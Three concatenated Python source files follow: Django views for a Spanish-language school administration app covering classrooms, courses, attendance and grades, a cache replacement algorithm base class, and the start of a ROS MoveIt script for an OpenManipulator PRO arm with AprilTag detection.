def get_context_data(self, **kwargs):
context = super(AulaListView, self).get_context_data(**kwargs)
request = get_current_request()
if request.session.get('colegio'):
id = request.session.get('colegio')
context['idcolegio'] = id
return context
class AulaDetailView(UpdateView):
model = Aula
form_class = AulaForm
template_name = 'aula_detail.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero', 'cajero']
if validar_roles(roles=roles):
aula_id = request.GET["aula"]
id_colegio = get_current_colegio()
matriculadosaula = Matricula.objects.filter(colegio_id=id_colegio, activo=True,
tipo_servicio=1).order_by('alumno__apellido_pa')
aula = Aula.objects.get(id_aula=aula_id)
matriculadosaula = AulaMatricula.objects.filter(aula=aula, activo=True).order_by('matricula__alumno__apellido_pa')
lista_matriculados = []
cursos = AulaCurso.objects.filter(aula=aula,
activo=True)
for matricula in matriculadosaula:
lista_matriculados.append(matricula.matricula)
cursos_docentes = []
for curso in cursos:
try:
cursos_docentes.append(CursoDocente.objects.get(curso=curso, activo=True))
except:
logger.info("No hay docente aun en el curso {0}".format(curso.curso))
return render(request, template_name=self.template_name, context={
'matriculados_aula': lista_matriculados,
'aula': aula,
'cursos':cursos,
'cursos_docentes':cursos_docentes,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class AulaCreationView(CreateView):
model = Aula
form_class = AulaForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'aula_form.html'
def form_valid(self, form):
form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
form.instance.tipo = 1
return super(AulaCreationView, self).form_valid(form)
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero']
if validar_roles(roles=roles):
return super(AulaCreationView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class AulaUpdateView(UpdateView):
model = Aula
form_class = AulaForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'aula_form.html'
class AulaDeleteView(DeleteView):
model = Aula
form_class = AulaForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'aula_confirm_delete.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(AulaDeleteView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#####################################################
##### CRUD DE CURSO #####
#####################################################
class CursoListView(MyLoginRequiredMixin, ListView):
model = Curso
template_name = 'curso_list.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(CursoListView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def get_context_data(self, **kwargs):
context = super(CursoListView, self).get_context_data(**kwargs)
request = get_current_request()
if request.session.get('colegio'):
id = request.session.get('colegio')
context['idcolegio'] = id
return context
class CursoDetailView(UpdateView):
model = Curso
form_class = CursoForm
template_name = 'curso_detail.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(CursoDetailView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class CursoCreationView(CreateView):
model = Curso
form_class = CursoForm
success_url = reverse_lazy('academic:curso_list')
template_name = 'curso_form.html'
def form_valid(self, form):
form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
return super(CursoCreationView, self).form_valid(form)
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(CursoCreationView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class CursoUpdateView(UpdateView):
model = Curso
form_class = CursoForm
success_url = reverse_lazy('academic:curso_list')
template_name = 'curso_form.html'
class CursoDeleteView(DeleteView):
model = Curso
form_class = CursoForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'curso_confirm_delete.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(CursoDeleteView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#####################################################
##### CRUD DE CURSO DOCENTE #####
#####################################################
class CursoDocenteCreateView(CreateView):
model = CursoDocente
form_class = CursoDocenteForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'cursodocente_form.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero']
if validar_roles(roles=roles):
personalcolegio = PersonalColegio.objects.filter(colegio_id=get_current_colegio(), activo=True)
personal = []
docentes = []
for personalcol in personalcolegio:
personal.append(personalcol.personal)
cursos = AulaCurso.objects.filter(id_aula_curso=request.GET['curso'],
activo=True)
for persona in personal:
try:
docentes.append(Docente.objects.get(empleado=persona))
except:
logger.info("Persona no es un docente ---- AE_academico")
return render(request, template_name=self.template_name, context={
'form': self.form_class,
'docentes': docentes,
'cursos': cursos,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#####################################################
##### CRUD DE AULA CURSO #####
#####################################################
class AulaCursoCreateView(TemplateView):
model = AulaCurso
success_url = reverse_lazy('academic:aula_list')
template_name = 'aulacurso_form.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero']
if validar_roles(roles=roles):
aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
cursos = Curso.objects.filter(colegio_id=get_current_colegio(), activo=True)
return render(request, template_name=self.template_name, context={
'aula': aula_actual,
'cursos': cursos,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def post(self, request, *args, **kwargs):
print(request.POST)
cursos = Curso.objects.filter(colegio_id=get_current_colegio(), activo=True)
aula = Aula.objects.get(id_aula=request.POST['aula'])
data_form = request.POST
for curso in cursos:
try:
text = "item{0}".format(curso.id_curso)
if data_form[text]:
aulacurso = self.model(
aula=aula,
curso=curso,
)
aulacurso.save()
print("se creo un registro")
except:
print("hay un error")
return HttpResponseRedirect(reverse('academic:aula_list'))
class AulaCursoDeleteView(TemplateView):
model = AulaCurso
form_class = AulaCursoForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'aulacurso_confirm_delete.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
aula_curso = self.model.objects.get(pk=int(request.GET['curso']))
for docente in aula_curso.getDocentesAsociados():
docente.activo = False
docente.save()
aula_curso.activo = False
aula_curso.save()
return HttpResponseRedirect(reverse('academic:aula_list'))
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#####################################################
##### ASISTENCIA ALUMNOS #####
#####################################################
class MarcarAsistenciaView(CreateView):
model = Asistencia
template_name = 'marcar_asistencia.html'
form_class = MarcarAsistenciaForm
success_url = reverse_lazy('academic:asistencia_ver')
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
# AQUI VA EL ID DE TIPO DE SERVICIO
id_tipo_servicio = 1
docente = True
id_colegio = get_current_colegio()
matriculadosaula = Matricula.objects.filter(colegio_id=id_colegio, activo=True, tipo_servicio=id_tipo_servicio).order_by('alumno__apellido_pa')
logger.info("Datos son {0}".format(matriculadosaula))
alumnos = []
for matriculado in matriculadosaula:
alumnos.append(matriculado.alumno)
return render(request, template_name=self.template_name, context={
'form': self.form_class,
'alumnos': alumnos,
'docente': docente,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def post(self, request, *args, **kwargs):
logger.info("Estoy en el POST")
logger.info("Los datos de llegada son {0}".format(request.POST))
data_post = request.POST
alumnos_id = data_post.getlist('id')
estado_asistencias = data_post.getlist('estado_asistencia')
logger.info("Los estados son {0}".format(estado_asistencias))
num = len(alumnos_id)
for n in range(0,num):
alumno = Alumno.objects.get(id_alumno = alumnos_id[n])
asistencia = Asistencia(alumno=alumno, fecha=datetime.date.today(), estado_asistencia=estado_asistencias[n])
asistencia.save()
contexto = {}
return redirect('academic:asistencia_ver')
class MarcarAsistenciaDiaView(TemplateView):
model = Asistencia
template_name = 'asistencia_marcar.html'
success_url = reverse_lazy('academic:asistencia_registrar_dia')
def MarcarAsistencia1Form(self, request):
roles = ['promotor', 'director']
if validar_roles(roles=roles):
# Cargamos las aulas relacionadas al colegio
id_colegio = get_current_colegio()
aulas_colegio = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
return {'aulas_colegio': aulas_colegio}
else:
mensaje_error = "No tienes acceso a esta vista"
return {'mensaje_error': mensaje_error} # return context
def MarcarAsistencia2Form(self, request):
roles = ['promotor', 'director']
if validar_roles(roles=roles):
# Cargamos los estados de asistencia
estado_asistencia = ["Sin registro", "Presente", "Tardanza", "Ausente"]
return {'estado_asistencia': estado_asistencia}
else:
mensaje_error = "No tienes acceso a esta vista"
return {'mensaje_error': mensaje_error} # return context
def get(self, request, *args, **kwargs):
super(MarcarAsistenciaDiaView, self).get(request, *args, **kwargs)
contexto = self.MarcarAsistencia1Form(request)
contexto.update(self.MarcarAsistencia2Form(request))
if 'mensaje_error' in contexto.keys():
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
else:
return render(request, self.template_name, contexto) # return context
def post(self, request, *args, **kwargs):
logger.info("Estoy en el POST")
logger.info("Los datos de llegada son {0}".format(request.POST))
if 'aula' in request.POST.keys():
aula = request.POST["aula"]
matriculadosaula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
logger.info("Datos son {0}".format(matriculadosaula))
alumnos = []
for matriculado in matriculadosaula:
alumnos.append(matriculado.matricula.alumno)
asistencia_hoy = []
num = len(alumnos)
for n in range (0, num):
asistencia_hoy.append(Asistencia.objects.filter(alumno=alumnos[n], fecha=datetime.date.today()))
logger.info("Las asistencias de hoy son {0}".format(asistencia_hoy))
contexto = self.MarcarAsistencia1Form(request)
contexto.update(self.MarcarAsistencia2Form(request))
contexto['alumnos'] = alumnos
contexto['asistencias'] = asistencia_hoy
return render(request, template_name=self.template_name, context=contexto)
else:
logger.info("Estoy en el POST")
logger.info("Los datos de llegada son {0}".format(request.POST))
data_post = request.POST
alumnos_id = data_post.getlist('id')
estado_asistencias = data_post.getlist('estado_asistencia')
estados = []
for estado in estado_asistencias:
if estado == 'Presente':
estados.append(1)
elif estado == 'Tardanza':
estados.append(2)
elif estado == 'Ausente':
estados.append(3)
else:
estados.append(4)
logger.info("Los estados son {0}".format(estado_asistencias))
num = len(alumnos_id)
for n in range(0, num):
alumno = Alumno.objects.get(id_alumno=alumnos_id[n])
asistencia_primera = Asistencia.objects.filter(alumno=alumno, fecha=datetime.date.today())
logger.info("{0}".format(asistencia_primera.count()))
if asistencia_primera.count() == 0:
asistencia = Asistencia(alumno=alumno, fecha=datetime.date.today(),
estado_asistencia=estados[n])
asistencia.save()
else:
for asistencia in asistencia_primera:
asistencia.estado_asistencia = estados[n]
asistencia.save()
return redirect('academic:asistencia_ver')
class VisualizarAsistenciaView(TemplateView):
model = Asistencia
template_name = "asistencia_ver.html"
#form_class = CuentasCobrarPromotorDetalleForm
def VisualizarAsistenciaform(self, request):
roles = ['promotor', 'director']
if validar_roles(roles=roles):
# Cargamos los meses
meses_todos = ["Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio", "Julio", "Agosto",
"Setiembre", "Octubre", "Noviembre", "Diciembre"]
num_mes = datetime.date.today().month
meses = []
for i in range(0, num_mes + 1):
meses.append(meses_todos[i])
id_colegio = get_current_colegio()
aulas = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
return {'meses': meses_todos, 'aulas': aulas}
else:
mensaje_error = "No tienes acceso a esta vista"
return {'mensaje_error': mensaje_error} # return context
def get(self, request, *args, **kwargs):
super(VisualizarAsistenciaView, self).get(request, *args, **kwargs)
contexto = self.VisualizarAsistenciaform(request)
if 'mensaje_error' in contexto.keys():
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
else:
return render(request, self.template_name, contexto) # return context
def post(self, request, *args, **kwargs):
mes = request.POST["mes"]
aula = request.POST["aula"]
num_mes = obtener_mes(mes)
logger.info("Estoy en el Post, datos de llegada son {0}".format(request.POST))
meses_dias = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
num_dias = meses_dias[num_mes-1]
#id_curso =
asistencias_curso = self.model.objects.filter()
# Proceso de filtrado según el año
anio = datetime.date.today().year
asistencias_curso_anio = asistencias_curso.filter(fecha__year=anio)
# Proceso de filtrado según el mes
asistencias_curso_mes = asistencias_curso_anio.filter(fecha__month=num_mes)
logger.info("La lista de asistencias de mes son {0}".format(asistencias_curso_mes))
matriculados_aula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
alumnos = []
for matriculado in matriculados_aula:
alumnos.append(matriculado.matricula.alumno)
num_alumnos = len(alumnos)
logger.info("El número de alumnos matriculados en esta aula es {0}".format(num_alumnos))
fechas = []
lista_asistencias_dia = []
for dia in range(0, num_dias):
asistencias_curso_dia = asistencias_curso_mes.filter(fecha__day=dia+1)
logger.info("La lista de asistencias del día {0} mes son {1}".format(dia+1, asistencias_curso_dia))
n = 0
for asistencias_dias in asistencias_curso_dia:
lista_asistencias_dia.append(asistencias_dias.estado_asistencia)
if n == 0:
fechas.append(asistencias_dias.fecha)
n = n + 1
num_horizontal = len(fechas)
num_vertical = len(alumnos)
aula_selected = Aula.objects.get(id_aula=aula)
logger.info("La lista de asistencias de mes son {0}".format(lista_asistencias_dia))
logger.info("La lista de fechas de mes son {0}".format(fechas))
contexto = self.VisualizarAsistenciaform(request)
contexto['asistencias'] = asistencias_curso_mes
contexto['num_hor'] = num_horizontal
contexto['num_ver'] = num_vertical
contexto['fechas'] = fechas
contexto['alumnos'] = alumnos
contexto['mes_selected'] = mes
contexto['aula_selected'] = aula_selected
return render(request, template_name=self.template_name, context=contexto)
#################################################
##### NOTAS ALUMNOS #####
#################################################
#################################################
##### EVENTOS #####
#################################################
class EventoCreateView(CreateView):
model = Evento
form_class = EventoForm
template_name = "evento_form.html"
success_url = reverse_lazy("academic:evento_list")
def form_valid(self, form):
form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
return super(EventoCreateView, self).form_valid(form)
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
personalcolegio = PersonalColegio.objects.filter(colegio_id=get_current_colegio(), activo=True)
personal = []
for personalcol in personalcolegio:
personal.append(personalcol.personal)
return render(request, template_name=self.template_name, context={
'form': self.form_class,
'empleados': personal,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class EventoListView(ListView):
model = Evento
form_class = EventoForm
template_name = "evento_list.html"
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
evento = Evento.objects.filter(colegio_id=get_current_colegio())
return render(request, template_name=self.template_name, context={
'eventos':evento,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class EventoDetailView(DetailView):
model = Evento
form_class = EventoForm
template_name = "evento_detail.html"
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
evento = Evento.objects.get(id_evento=request.GET['evento'])
return render(request, template_name=self.template_name, context={
'evento':evento,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#################################################
##### CRUD DE MATRICULA AULA #####
#################################################
class AulaMatriculaCreateView(TemplateView):
model = AulaMatricula
success_url = reverse_lazy('academic:aula_list')
template_name = 'aulamatricula_form.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
no_matriculados_aulas = []
aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
matriculas = Matricula.objects.filter(tipo_servicio=aula_actual.tipo_servicio,colegio_id=get_current_colegio(), activo=True)
for matricula in matriculas:
alumno_aula = AulaMatricula.objects.filter(matricula=matricula, activo = True)
if alumno_aula:
logger.info("El alumno {0} ya tiene aula".format(matricula.alumno))
else:
no_matriculados_aulas.append(matricula)
return render(request, template_name=self.template_name, context={
'aula': aula_actual,
'matriculas': no_matriculados_aulas,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def post(self, request, *args, **kwargs):
logger.info(request.POST)
aula_actual = Aula.objects.get(id_aula=request.POST['aula'])
matriculas = Matricula.objects.filter(tipo_servicio=aula_actual.tipo_servicio, colegio_id=get_current_colegio(),
activo=True)
data_form = request.POST
for matricula in matriculas:
try:
text = "item{0}".format(matricula.id_matricula)
if data_form[text]:
aulamatricula = self.model(
aula=aula_actual,
matricula=matricula,
)
aulamatricula.save()
logger.info("se creo un registro")
except:
logger.info("hay un error")
return HttpResponseRedirect(reverse('academic:aula_list'))
class AulaMatriculaDeleteView(TemplateView):
model = AulaMatricula
template_name = "aulamatricula_form.html"
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
print(request.GET['alumno'])
matricula = Matricula.objects.get(id_matricula=int(request.GET['alumno']))
alumno = AulaMatricula.objects.get(matricula=matricula)
alumno.activo = False
alumno.save()
return HttpResponseRedirect(reverse('academic:aula_list'))
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#################################################
##### CRUD DE PERIODO ACADEMICO #####
#################################################
class PeriodoAcademicoListView(MyLoginRequiredMixin, ListView):
model = PeriodoAcademico
template_name = 'periodo_list.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(PeriodoAcademicoListView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def get_context_data(self, **kwargs):
context = super(PeriodoAcademicoListView, self).get_context_data(**kwargs)
request = get_current_request()
if request.session.get('colegio'):
id = request.session.get('colegio')
context['idcolegio'] = id
return context
class PeriodoAcademicoDetailView(UpdateView):
model = PeriodoAcademico
form_class = PeriodoAcademicoForm
template_name = 'periodo_detail.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(PeriodoAcademicoDetailView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class PeriodoAcademicoCreationView(CreateView):
model = PeriodoAcademico
form_class = PeriodoAcademicoForm
success_url = reverse_lazy('academic:periodo_list')
template_name = 'periodo_form.html'
def form_valid(self, form):
form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
return super(PeriodoAcademicoCreationView, self).form_valid(form)
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo']
if validar_roles(roles=roles):
return super(PeriodoAcademicoCreationView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
class PeriodoAcademicoUpdateView(UpdateView):
model = PeriodoAcademico
form_class = PeriodoAcademicoForm
success_url = reverse_lazy('academic:periodo_list')
template_name = 'periodo_form.html'
#####################################################
##### NOTAS DE ALUMNOS #####
#####################################################
class RegistrarNotasAlumnosView(TemplateView):
model = Notas
template_name = 'notas_registrar.html'
success_url = reverse_lazy('academic:asistencia_registrar_dia')
form2 = RegistrarNotas2Form
def RegistrarNotas1Form(self, request):
roles = ['promotor', 'director']
if validar_roles(roles=roles):
# Cargamos las aulas relacionadas al colegio
id_colegio = get_current_colegio()
periodos_colegio = PeriodoAcademico.objects.filter(colegio=id_colegio).order_by('nombre')
if periodos_colegio.count() == 0:
periodos_colegio = ["No hay periodos registrados"]
# Cargamos las aulas relacionadas al colegio
id_colegio = get_current_colegio()
aulas_colegio = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
if aulas_colegio.count() == 0:
aulas_colegio = ["No hay aulas registradas"]
cursos =[]
cursos_aula = AulaCurso.objects.filter(curso__colegio=id_colegio)
for curso_aula in cursos_aula:
cursos.append(curso_aula.curso)
return {'aulas_colegio': aulas_colegio, 'periodos_colegio': periodos_colegio, 'cursos_aula': cursos}
else:
mensaje_error = "No tienes acceso a esta vista"
return {'mensaje_error': mensaje_error} # return context
def get(self, request, *args, **kwargs):
super(RegistrarNotasAlumnosView, self).get(request, *args, **kwargs)
contexto = self.RegistrarNotas1Form(request)
contexto2 ={'form2': self.form2}
contexto.update(contexto2)
if 'mensaje_error' in contexto.keys():
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
else:
return render(request, self.template_name, contexto) # return context
def post(self, request, *args, **kwargs):
logger.info("Estoy en el POST")
logger.info("Los datos de llegada son {0}".format(request.POST))
if 'aula' in request.POST.keys():
aula = request.POST["aula"]
periodo = request.POST["periodo_academico"]
curso = request.POST["curso"]
aula_selected = Aula.objects.get(id_aula=aula)
periodo_selected = PeriodoAcademico.objects.get(id_periodo_academico=periodo)
curso_selected = Curso.objects.get(id_curso=curso)
matriculadosaula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
logger.info("Datos son {0}".format(matriculadosaula))
alumnos = []
for matriculado in matriculadosaula:
alumnos.append(matriculado.matricula.alumno)
contexto = self.RegistrarNotas1Form(request)
contexto2 = {'form2': self.form2}
contexto.update(contexto2)
contexto['alumnos'] = alumnos
contexto['aula_selected'] = aula_selected
contexto['periodo_selected'] = periodo_selected
contexto['curso_selected'] = curso_selected
return render(request, template_name=self.template_name, context=contexto)
else:
logger.info("Estoy en el POST")
logger.info("Los datos de llegada son {0}".format(request.POST))
data_post = request.POST
alumnos_id = data_post.getlist('id')
notas = data_post.getlist('nota')
curso_id = data_post['curso']
periodo_id = data_post['periodo']
colegio_id = get_current_colegio()
curso = Curso.objects.get(id_curso=curso_id)
periodo = PeriodoAcademico.objects.get(id_periodo_academico=periodo_id)
colegio = Colegio.objects.get(id_colegio=colegio_id)
num = len(alumnos_id)
for n in range(0, num):
alumno = Alumno.objects.get(id_alumno=alumnos_id[n])
nota = Notas(alumno=alumno, curso=curso, periodo_academico=periodo, nota=notas[n], colegio=colegio)
nota.save()
return redirect('academic:notas_ver')
class VisualizarNotasView(TemplateView):
model = Notas
template_name = "notas_ver.html"
def VisualizarNotasform(self, request):
roles = ['promotor', 'director']
if validar_roles(roles=roles):
# Cargamos los meses
meses_todos = ["Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio", "Julio", "Agosto",
"Setiembre", "Octubre", "Noviembre", "Diciembre"]
num_mes = datetime.date.today().month
meses = []
for i in range(0, num_mes + 1):
meses.append(meses_todos[i])
id_colegio = get_current_colegio()
aulas = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
return {'meses': meses_todos, 'aulas': aulas}
else:
mensaje_error = "No tienes acceso a esta vista"
return {'mensaje_error': mensaje_error} # return context
def get(self, request, *args, **kwargs):
super(VisualizarAsistenciaView, self).get(request, *args, **kwargs)
contexto = self.VisualizarAsistenciaform(request)
if 'mensaje_error' in contexto.keys():
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
else:
return render(request, self.template_name, contexto) # return context
def post(self, request, *args, **kwargs):
mes = request.POST["mes"]
aula = request.POST["aula"]
num_mes = obtener_mes(mes)
logger.info("Estoy en el Post, datos de llegada son {0}".format(request.POST))
meses_dias = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
num_dias = meses_dias[num_mes - 1]
# id_curso =
asistencias_curso = self.model.objects.filter()
# Proceso de filtrado según el año
anio = datetime.date.today().year
asistencias_curso_anio = asistencias_curso.filter(fecha__year=anio)
# Proceso de filtrado según el mes
asistencias_curso_mes = asistencias_curso_anio.filter(fecha__month=num_mes)
logger.info("La lista de asistencias de mes son {0}".format(asistencias_curso_mes))
matriculados_aula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
alumnos = []
for matriculado in matriculados_aula:
alumnos.append(matriculado.matricula.alumno)
num_alumnos = len(alumnos)
logger.info("El número de alumnos matriculados en esta aula es {0}".format(num_alumnos))
fechas = []
lista_asistencias_dia = []
for dia in range(0, num_dias):
asistencias_curso_dia = asistencias_curso_mes.filter(fecha__day=dia + 1)
logger.info(
"La lista de asistencias del día {0} mes son {1}".format(dia + 1, asistencias_curso_dia))
n = 0
for asistencias_dias in asistencias_curso_dia:
lista_asistencias_dia.append(asistencias_dias.estado_asistencia)
if n == 0:
fechas.append(asistencias_dias.fecha)
n = n + 1
num_horizontal = len(fechas)
num_vertical = len(alumnos)
aula_selected = Aula.objects.get(id_aula=aula)
logger.info("La lista de asistencias de mes son {0}".format(lista_asistencias_dia))
logger.info("La lista de fechas de mes son {0}".format(fechas))
contexto = self.VisualizarAsistenciaform(request)
contexto['asistencias'] = asistencias_curso_mes
contexto['num_hor'] = num_horizontal
contexto['num_ver'] = num_vertical
contexto['fechas'] = fechas
contexto['alumnos'] = alumnos
contexto['mes_selected'] = mes
contexto['aula_selected'] = aula_selected
return render(request, template_name=self.template_name, context=contexto)
#################################################
##### HORARIOS DE CURSOS #####
#################################################
class HorarioAulaCreateView(CreateView):
model = HorarioAula
form_class = HorarioAulaForm
success_url = reverse_lazy('academic:aula_list')
template_name = 'horarios_aula.html'
"""
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero']
if validar_roles(roles=roles):
curso = CursoDocente.objects.filter(curso=request.GET["curso"], activo=True)
return render(request, template_name=self.template_name, context={
'form': self.form_class,
'curso': curso,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
"""
def get_cursos(request):
if request.is_ajax():
id_aula = request.GET.get("id_aula", " ")
aula_cursos = AulaCurso.objects.filter(aula__id_aula=int(id_aula))
results = []
for aula_curso in aula_cursos:
aula_curso_json = {}
aula_curso_json['id'] = aula_curso.curso.id_curso
aula_curso_json['value'] = aula_curso.curso.nombre
results.append(aula_curso_json)
data = json.dumps(results)
else:
data = 'fail'
mimetype = 'application/json'
return HttpResponse(data, mimetype)
#########################################
###### RECORDATORIOS TAREAS Y PCS #######
#########################################
class RecordatorioAulaCreateView(CreateView):
model = RecordatorioAula
success_url = reverse_lazy('academic:aula_list')
template_name = 'recordatorio_aula_form.html'
form_class = RecordatorioAulaForm
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero']
if validar_roles(roles=roles):
aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
return render(request, template_name=self.template_name, context={
'aula': aula_actual,
'form': self.form_class,
})
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
def post(self, request, *args, **kwargs):
data_form = request.POST
aula = Aula.objects.get(id_aula=request.POST['aula'])
nombre = data_form['nombre']
fecha = data_form['fecha_programacion']
estado = 1 # ESTO SIGNIFICA QUE EL EVENTO FUE CREADO
descripcion = data_form['descripcion']
recordatorio = RecordatorioAula(aula=aula, fecha_programacion=fecha, nombre=nombre, estado=estado, descripcion=descripcion)
recordatorio.save()
return HttpResponseRedirect(reverse('academic:aula_list'))
| 40,565 | 12,678 |
from abc import ABCMeta, abstractmethod
import collections
class ReplaceAlgo(metaclass=ABCMeta):
def __init__(self, capacity):
self.cache_capacity = capacity
self.cache_size = 0
self.cache_stack = collections.OrderedDict()
self.write2disk = 0
self.transportfrombackend = 0
self.hc = 0
self.tc = 0
self.bhc = 0
self.tbc = 0
self.trigger = False # start counting hr/bhr/... flag
@abstractmethod
def query(self, s):
pass
def set_trigger(self):
self.trigger = True
def output(self):
# format: hr bhr write2disk transportfrombackend
return str(float('{0:.6f}'.format(1.0 * self.hc / self.tc))) + '\t\t' \
+ str(float('{0:.6f}'.format(1.0 * self.bhc / self.tbc))) + '\t\t' \
+ str(self.write2disk) + '\t\t' \
+ str(self.transportfrombackend)
@abstractmethod
def my_release(self):
pass
class Node():
def __init__(self, size):
self.size = size # image size
self.source_flag = 0 # flag if the node is generated from prefetcher or cache mssing, 0 is cache missing.
self.stat_count = 1 # statistic the request times of life time in cache
| 1,273 | 411 |
#!/usr/bin/env python
import sys
import rospy
from math import pi
import moveit_commander
from moveit_msgs.msg import DisplayTrajectory
from apriltag_ros.msg import AprilTagDetectionArray
# CONSTANTS
N_ROBOT_JOINTS = 6
POSE_TOLERANCE = 0.05
FRAMES_LIMIT = 25
ROTATION_DEGREE = -10
J1_LIMIT_DEGREE = -90
class openManipulatorPRO:
def __init__(self):
# ROS NODE INIT
rospy.init_node('OMP_gripper_moveit_commander')
# TAG DETECTION - VARS
self.tag_found = 0 # FOUND TAG
self.init_pose = 0 # STOP TO FIND TAG BEFORE START ROUTINE
self.frames_count = 0 # FRAMES COUNT
# MOVEIT INIT
moveit_commander.roscpp_initialize(sys.argv)
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
self.group = moveit_commander.MoveGroupCommander("arm")
self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', DisplayTrajectory,queue_size=20)
# TAG DETECTION INIT
self.tag_id_subscriber = rospy.Subscriber('/tag_detections', AprilTagDetectionArray,self.tagCB)
# MOVEIT RESTRICTIONS
self.group.set_goal_position_tolerance(POSE_TOLERANCE) # GOAL TOLERANCE
self.group.set_planning_time(5) # TIME TO PLANNING
# FUNCTION - CALLBACK
def tagCB(self,data):
if (self.tag_found is not 1) and (len(data.detections) is not 0):
if data.detections[0].id[0] == 1 and self.init_pose == 1:
self.frames_count += 1
else:
self.seq_counts = 0
if self.frames_count == FRAMES_LIMIT and self.init_pose == 1:
self.tag_found = 1
else:
pass
# FUNCTION - GO TO SPECIFIC POSE
def go_to_pose(self, pose_name):
## WE CAN PLAN AND EXECUTE A MOTION FOR THIS GROUP TO A DESIRED SAVED POSE FOR THE END-EFF
# 1 - PASS YOUR POSE SAVED ON SETUP ASSISTANT
self.group.set_named_target(pose_name)
# 2 - PLAN AND EXECUTE
self.group.go(wait=True)
# 3 - PREVENT RESIDUAL MOVEMENT
